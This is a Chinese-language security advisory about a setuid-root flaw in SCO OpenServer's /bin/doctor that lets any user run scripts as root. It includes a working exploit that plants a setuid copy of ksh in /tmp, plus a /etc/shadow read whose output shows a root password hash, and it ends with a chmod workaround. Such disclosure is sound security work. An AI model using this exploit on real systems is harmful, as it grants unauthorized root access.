首页 -> 安全研究

安全研究

安全漏洞
SCO openserver /bin/doctor安全漏洞

发布日期:2000-01-14
更新日期:2000-01-14

受影响系统:
SCO openserver 5.0.5
SCO openserver 5.0.4
不受影响系统:
SCO openserver 4.2
描述:
SCO openserver中/bin/doctor缺省属主是root,并且被设置了setuid位.Bugtraq中已经有
人报告说普通用户可以通过doctor提供的菜单以root身份执行任何命令.但只有在root运行
doctor进行一些必要的设置后,普通用户才可以访问到它的菜单.因此,如果root没有运行过
doctor,普通用户就不能利用这个漏洞.但lgwu发现doctor存在一个更严重的漏洞,doctor
的-s参数允许任何用户在命令行运行一个shell脚本.因此,普通用户可以轻易得到root权限.

另外,如果用任意的系统文件做-s的参数,该文件的第一行将被显示.

<* 来源 : lgwu    (lgwu@ahu.edu.cn) *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-----------------  test exploit 1 ---------------------
lgwu$ cat > 1
#!/bin/sh
cp /bin/ksh /tmp/sh
chmod 4755 /tmp/sh
^d
lgwu$ chmod 755 1
lgwu$ /bin/doctor -s ./1
a little while.............
lgwu$ /tmp/sh
#

-----------------  test exploit 2 ---------------------

scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"


建议:
临时解决办法: chmod 700 /bin/doctor

浏览次数:6758
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障